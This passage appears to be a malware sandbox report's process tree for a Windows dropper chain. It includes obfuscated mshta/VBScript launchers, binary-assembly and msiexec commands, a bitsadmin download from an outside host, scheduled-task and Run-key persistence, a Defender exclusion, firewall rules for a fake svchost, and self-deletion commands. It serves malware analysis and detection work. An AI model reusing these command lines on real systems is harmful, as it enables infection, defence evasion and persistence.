- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3844 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:7440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:6292
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:6572
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
- Blocklisted process makes network request
PID:6952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:7568 -
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
PID:8700 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zrTMrQGe8QxtPQACszHEqUvM.exe"10⤵
- Kills process with taskkill
PID:3060 -
C:\Users\Admin\Pictures\Adobe Films\NARe8zjEE0fBGUmV6IDsSwRu.exe"C:\Users\Admin\Pictures\Adobe Films\NARe8zjEE0fBGUmV6IDsSwRu.exe"7⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\is-NJ30J.tmp\NARe8zjEE0fBGUmV6IDsSwRu.tmp"C:\Users\Admin\AppData\Local\Temp\is-NJ30J.tmp\NARe8zjEE0fBGUmV6IDsSwRu.tmp" /SL5="$203E0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\NARe8zjEE0fBGUmV6IDsSwRu.exe"8⤵
- Loads dropped DLL
PID:8060 -
C:\Users\Admin\AppData\Local\Temp\is-UHKAS.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-UHKAS.tmp\DYbALA.exe" /S /UID=27099⤵
- Drops file in Drivers directory
PID:6524 -
C:\Users\Admin\AppData\Local\Temp\cc-5581e-3ed-af092-dd5f6673f06fd\Dolipurape.exe"C:\Users\Admin\AppData\Local\Temp\cc-5581e-3ed-af092-dd5f6673f06fd\Dolipurape.exe"10⤵PID:812
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qddiokgq.bwr\GcleanerEU.exe /eufive & exit11⤵PID:10520
-
C:\Users\Admin\AppData\Local\Temp\qddiokgq.bwr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qddiokgq.bwr\GcleanerEU.exe /eufive12⤵PID:10680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10680 -s 25613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:11212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uxocbf0v.bxs\installer.exe /qn CAMPAIGN="654" & exit11⤵PID:10744
-
C:\Users\Admin\AppData\Local\Temp\uxocbf0v.bxs\installer.exeC:\Users\Admin\AppData\Local\Temp\uxocbf0v.bxs\installer.exe /qn CAMPAIGN="654"12⤵PID:12048
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zzv344nb.4ai\any.exe & exit11⤵PID:10928
-
C:\Users\Admin\AppData\Local\Temp\zzv344nb.4ai\any.exeC:\Users\Admin\AppData\Local\Temp\zzv344nb.4ai\any.exe12⤵PID:11500
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0lv3wjp.gf3\gcleaner.exe /mixfive & exit11⤵PID:11736
-
C:\Users\Admin\AppData\Local\Temp\j0lv3wjp.gf3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j0lv3wjp.gf3\gcleaner.exe /mixfive12⤵PID:12672
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12672 -s 25213⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:13224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhcn53ct.h5t\autosubplayer.exe /S & exit11⤵PID:13912
-
C:\Users\Admin\AppData\Local\Temp\nhcn53ct.h5t\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\nhcn53ct.h5t\autosubplayer.exe /S12⤵
- Drops file in Program Files directory
PID:14192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵PID:15432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵PID:16820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵PID:18112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵PID:19156
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵PID:3272
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵PID:5888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
- Checks for any installed AV software in registry
PID:6032 -
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z13⤵
- Download via BitsAdmin
PID:8480 -
C:\Users\Admin\Pictures\Adobe Films\lynQNpjuXTkz19lqZDKxEA1L.exe"C:\Users\Admin\Pictures\Adobe Films\lynQNpjuXTkz19lqZDKxEA1L.exe"7⤵PID:7732
-
C:\Users\Admin\Pictures\Adobe Films\V72hLI8G_m6CbhQN1gHdnJbA.exe"C:\Users\Admin\Pictures\Adobe Films\V72hLI8G_m6CbhQN1gHdnJbA.exe"7⤵
- Loads dropped DLL
PID:2848 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
PID:6988 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
- Loads dropped DLL
PID:9660 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcbd47dec0,0x7ffcbd47ded0,0x7ffcbd47dee010⤵PID:10824
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff64d709e70,0x7ff64d709e80,0x7ff64d709e9011⤵PID:10904
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,12060395314990717915,4153827000368964774,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9660_1267978480" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:210⤵PID:11408
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,12060395314990717915,4153827000368964774,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9660_1267978480" --mojo-platform-channel-handle=1820 /prefetch:810⤵PID:11452
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:6612 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:2288 -
C:\Users\Admin\Pictures\Adobe Films\0XwBVgDT3ezgJG3_0dQD72qz.exe"C:\Users\Admin\Pictures\Adobe Films\0XwBVgDT3ezgJG3_0dQD72qz.exe"5⤵
- Executes dropped EXE
PID:3384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05a277b9a3d2.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05a277b9a3d2.exeFri05a277b9a3d2.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:420 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05a277b9a3d2.exeC:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05a277b9a3d2.exe5⤵
- Executes dropped EXE
PID:5520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri051e1e7444.exe3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri051e1e7444.exeFri051e1e7444.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3272 -
C:\Users\Admin\Pictures\Adobe Films\sh4hflfTIu9X6CgvU_tIR6x4.exe"C:\Users\Admin\Pictures\Adobe Films\sh4hflfTIu9X6CgvU_tIR6x4.exe"5⤵
- Executes dropped EXE
PID:5240 -
C:\Users\Admin\Pictures\Adobe Films\tPwENUt61mkw9jaaKJZITT4q.exe"C:\Users\Admin\Pictures\Adobe Films\tPwENUt61mkw9jaaKJZITT4q.exe"5⤵
- Executes dropped EXE
PID:4208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7028 -
C:\Users\Admin\Pictures\Adobe Films\dWSLTf9aevg5YZImfbAMqQKt.exe"C:\Users\Admin\Pictures\Adobe Films\dWSLTf9aevg5YZImfbAMqQKt.exe"5⤵
- Executes dropped EXE
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"6⤵PID:6952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit7⤵PID:7724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f8⤵
- Kills process with taskkill
PID:1452 -
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:5940 -
C:\Users\Admin\Pictures\Adobe Films\djOzqaDxuN4ftzSDioAOukfA.exe"C:\Users\Admin\Pictures\Adobe Films\djOzqaDxuN4ftzSDioAOukfA.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2228 -
C:\Users\Admin\Pictures\Adobe Films\fpnxpWGlulH21GfBlEce4NmL.exe"C:\Users\Admin\Pictures\Adobe Films\fpnxpWGlulH21GfBlEce4NmL.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
PID:3276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\li1YaZUKqd.bat"6⤵PID:6260
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7792 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:7236
-
C:\PerfLogs\smss.exe"C:\PerfLogs\smss.exe"7⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:7960 -
C:\Users\Admin\Pictures\Adobe Films\AzLsZLp_D4ayNkuN341bjJBG.exe"C:\Users\Admin\Pictures\Adobe Films\AzLsZLp_D4ayNkuN341bjJBG.exe"5⤵
- Executes dropped EXE
PID:5320 -
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"6⤵
- Executes dropped EXE
PID:6628 -
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"6⤵
- Executes dropped EXE
PID:6616 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"6⤵
- Executes dropped EXE
PID:6592 -
C:\Users\Admin\Pictures\Adobe Films\7KwyEbC_NANhTQEeLeSH13jc.exe"C:\Users\Admin\Pictures\Adobe Films\7KwyEbC_NANhTQEeLeSH13jc.exe"5⤵PID:5536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 2526⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6684 -
C:\Users\Admin\Pictures\Adobe Films\Jj7boAeoG56W1zy74ULeu0nk.exe"C:\Users\Admin\Pictures\Adobe Films\Jj7boAeoG56W1zy74ULeu0nk.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3948 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 17486⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6912 -
C:\Users\Admin\Pictures\Adobe Films\F3GlpsiIrfzDVicX03Ub1cxP.exe"C:\Users\Admin\Pictures\Adobe Films\F3GlpsiIrfzDVicX03Ub1cxP.exe"5⤵
- Executes dropped EXE
PID:4036 -
C:\Users\Admin\Pictures\Adobe Films\4BqjvA9G3qh1x_0g7cfYqK0k.exe"C:\Users\Admin\Pictures\Adobe Films\4BqjvA9G3qh1x_0g7cfYqK0k.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:2272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\6⤵PID:6196
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:1080
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:3556
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2288
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM6⤵
- Creates scheduled task(s)
PID:6992 -
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal6⤵PID:7712
-
C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"5⤵
- Executes dropped EXE
PID:2292 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:6600
-
C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6164 -
C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"6⤵PID:7976
-
C:\Users\Admin\Pictures\Adobe Films\GYm5cBJ0pNxSWLyCMO8rktun.exe"C:\Users\Admin\Pictures\Adobe Films\GYm5cBJ0pNxSWLyCMO8rktun.exe"5⤵
- Executes dropped EXE
PID:6220 -
C:\Users\Admin\AppData\Roaming\1166618.exe"C:\Users\Admin\AppData\Roaming\1166618.exe"6⤵PID:1208
-
C:\Users\Admin\AppData\Roaming\6843314.exe"C:\Users\Admin\AppData\Roaming\6843314.exe"6⤵PID:5504
-
C:\Users\Admin\AppData\Roaming\7383269.exe"C:\Users\Admin\AppData\Roaming\7383269.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5852 -
C:\Users\Admin\AppData\Roaming\5795695.exe"C:\Users\Admin\AppData\Roaming\5795695.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5692 -
C:\Users\Admin\AppData\Roaming\8246734.exe"C:\Users\Admin\AppData\Roaming\8246734.exe"6⤵
- Suspicious behavior: SetClipboardViewer
PID:6772 -
C:\Users\Admin\AppData\Roaming\8090362.exe"C:\Users\Admin\AppData\Roaming\8090362.exe"6⤵PID:6016
-
C:\Users\Admin\Pictures\Adobe Films\0ZczbYCvQV_ikxNuZbNQ7AKv.exe"C:\Users\Admin\Pictures\Adobe Films\0ZczbYCvQV_ikxNuZbNQ7AKv.exe"5⤵PID:7088
-
C:\Users\Admin\AppData\Local\Temp\is-5OC0M.tmp\0ZczbYCvQV_ikxNuZbNQ7AKv.tmp"C:\Users\Admin\AppData\Local\Temp\is-5OC0M.tmp\0ZczbYCvQV_ikxNuZbNQ7AKv.tmp" /SL5="$70254,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0ZczbYCvQV_ikxNuZbNQ7AKv.exe"6⤵
- Loads dropped DLL
PID:6448 -
C:\Users\Admin\Pictures\Adobe Films\GiF4PhaN6EmQoBJJNwjurt9l.exe"C:\Users\Admin\Pictures\Adobe Films\GiF4PhaN6EmQoBJJNwjurt9l.exe"5⤵
- Loads dropped DLL
PID:5452 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5432 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:9648 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffcbd47dec0,0x7ffcbd47ded0,0x7ffcbd47dee08⤵PID:10796
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x194,0x1c4,0x7ff64d709e70,0x7ff64d709e80,0x7ff64d709e909⤵PID:10912
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=1836 /prefetch:88⤵PID:11440
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1780 /prefetch:28⤵PID:11432
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=2232 /prefetch:88⤵PID:11540
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2548 /prefetch:18⤵PID:11780
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=2436 /prefetch:88⤵PID:11768
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=2696 /prefetch:18⤵PID:11968
-
